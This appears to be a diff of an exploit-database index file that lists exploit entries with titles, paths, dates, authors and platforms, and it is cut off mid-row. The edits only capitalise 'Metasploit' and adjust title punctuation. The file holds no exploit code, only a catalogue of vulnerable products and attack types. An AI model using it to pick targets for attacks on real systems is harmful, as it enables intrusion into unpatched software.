+29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 +29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -26953,9 +26953,9 @@ id,file,description,date,author,platform,type,port 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 -29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0 -29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0 -29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080 +29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,Metasploit,windows,remote,0 +29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,Metasploit,windows,remote,0 +29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,Metasploit,java,remote,8080 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",windows,dos,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Include",2007-04-16,BeyazKurt,php,webapps,0 @@ -27046,7 +27046,7 @@ id,file,description,date,author,platform,type,port 29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local",2007-05-04,poplix,osx,local,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.php Remote File Include",2007-05-07,kezzap66345,php,webapps,0 -29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 +29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module Index.php SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 order_form.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 sendmail.php PATH_INFO Parameter XSS",2007-05-02,CorryL,php,webapps,0 @@ -27096,10 +27096,10 @@ id,file,description,date,author,platform,type,port 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 -30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,metasploit,java,remote,0 -30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 -30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 -30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 +30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,Metasploit,java,remote,0 +30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,Metasploit,windows,remote,12221 +30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,Metasploit,php,remote,80 +30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,Metasploit,windows,remote,0 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 @@ -27119,11 +27119,11 @@ id,file,description,date,author,platform,type,port 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.php Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote,0 -30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 Rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 +30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - Rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service",2007-05-24,"Bart Oldeman",linux,dos,0 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 -30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 +30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Stored Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.php Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 @@ -27141,10 +27141,10 @@ id,file,description,date,author,platform,type,port 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0 -30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 -30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,metasploit,multiple,remote,80 +30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,Metasploit,windows,remote,8080 +30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 -30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 +30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,Metasploit,php,remote,80 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 @@ -27177,7 +27177,7 @@ id,file,description,date,author,platform,type,port 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.php Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x ICity Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 -30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 +30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service",2007-06-27,35c666,windows,dos,0 30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 @@ -27192,11 +27192,11 @@ id,file,description,date,author,platform,type,port 30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 30265,platforms/multiple/remote/30265.txt,"SAP Message Server Group Parameter Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 -30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 -30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 netflow/jspui/index.jsp view Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 -30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 -30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 +30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 @@ -27227,7 +27227,7 @@ id,file,description,date,author,platform,type,port 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 -30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,metasploit,win_x86-64,local,0 +30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,Metasploit,win_x86-64,local,0 30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 cp.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 user.php u Parameter XSS",2007-07-25,Lostmon,php,webapps,0 30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 @@ -27237,7 +27237,7 @@ id,file,description,date,author,platform,type,port 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.php Directory Traversal",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.php Remote File Include",2007-07-26,S4M3K,php,webapps,0 -30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 +30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,Metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 @@ -27273,7 +27273,7 @@ id,file,description,date,author,platform,type,port 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 -30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,metasploit,linux,remote,443 +30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,Metasploit,linux,remote,443 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box",2013-12-16,"Matt O'Connor",hardware,webapps,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.php Backdoor",2007-11-21,D4m14n,php,webapps,0 @@ -27361,11 +27361,11 @@ id,file,description,date,author,platform,type,port 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - (.rmp) Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - Search.ASP SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 -30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution",2013-12-24,metasploit,unix,remote,5000 -30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution",2013-12-24,metasploit,linux,remote,80 -30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - LFI",2013-12-24,metasploit,linux,remote,7071 -30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution",2013-12-24,metasploit,unix,remote,8080 -30474,platforms/windows/remote/30474.rb,"Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,metasploit,windows,remote,0 +30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution",2013-12-24,Metasploit,unix,remote,5000 +30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution",2013-12-24,Metasploit,linux,remote,80 +30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - LFI",2013-12-24,Metasploit,linux,remote,7071 +30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution",2013-12-24,Metasploit,unix,remote,8080 +30474,platforms/windows/remote/30474.rb,"Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,Metasploit,windows,remote,0 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 @@ -27432,7 +27432,7 @@ id,file,description,date,author,platform,type,port 30538,platforms/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",hardware,dos,0 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 index.php Multiple SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 30540,platforms/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",multiple,dos,0 -30541,platforms/asp/webapps/30541.txt,"Cisco CallManager <= 4.2 / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 +30541,platforms/asp/webapps/30541.txt,"Cisco CallManager <= 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos,0 @@ -27485,7 +27485,7 @@ id,file,description,date,author,platform,type,port 32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0 -32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0 +32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,Metasploit,unix,remote,0 32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection",2008-09-23,"GeNiUs IrAQI",php,webapps,0 32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal",2008-09-23,AlbaniaN-[H],asp,webapps,0 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting",2008-09-23,"Hadi Kiamarsi",php,webapps,0 @@ -27511,7 +27511,7 @@ id,file,description,date,author,platform,type,port 32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",solaris,remote,0 32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass and SQL Injection Vulnerabilities",2008-09-17,JosS,php,webapps,0 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443 +33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 @@ -27626,7 +27626,7 @@ id,file,description,date,author,platform,type,port 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Local Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Local Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 30682,platforms/php/webapps/30682.txt,"SiteBar <= 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 -30683,platforms/php/webapps/30683.txt,"SiteBar <= 3.3.8 (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 +30683,platforms/php/webapps/30683.txt,"SiteBar <= 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 @@ -27682,7 +27682,7 @@ id,file,description,date,author,platform,type,port 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.php Local File Include",2007-11-03,joseph.giron13,php,webapps,0 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote,0 -30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.php Remote File Include",2007-11-05,"arfis project",php,webapps,0 +30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Include",2007-11-05,"arfis project",php,webapps,0 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0 30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote,0 @@ -27733,9 +27733,9 @@ id,file,description,date,author,platform,type,port 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0 30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 -30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 -30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 -30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 +30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,Metasploit,php,remote,80 +30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,Metasploit,windows,local,0 +30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,Metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 Index.php Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 Ierpplug.DLL PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 @@ -27795,7 +27795,7 @@ id,file,description,date,author,platform,type,port 30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include",2007-12-15,"Michael Brooks",php,webapps,0 -30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 +30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 @@ -27820,7 +27820,7 @@ id,file,description,date,author,platform,type,port 30912,platforms/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 30913,platforms/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 30914,platforms/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - 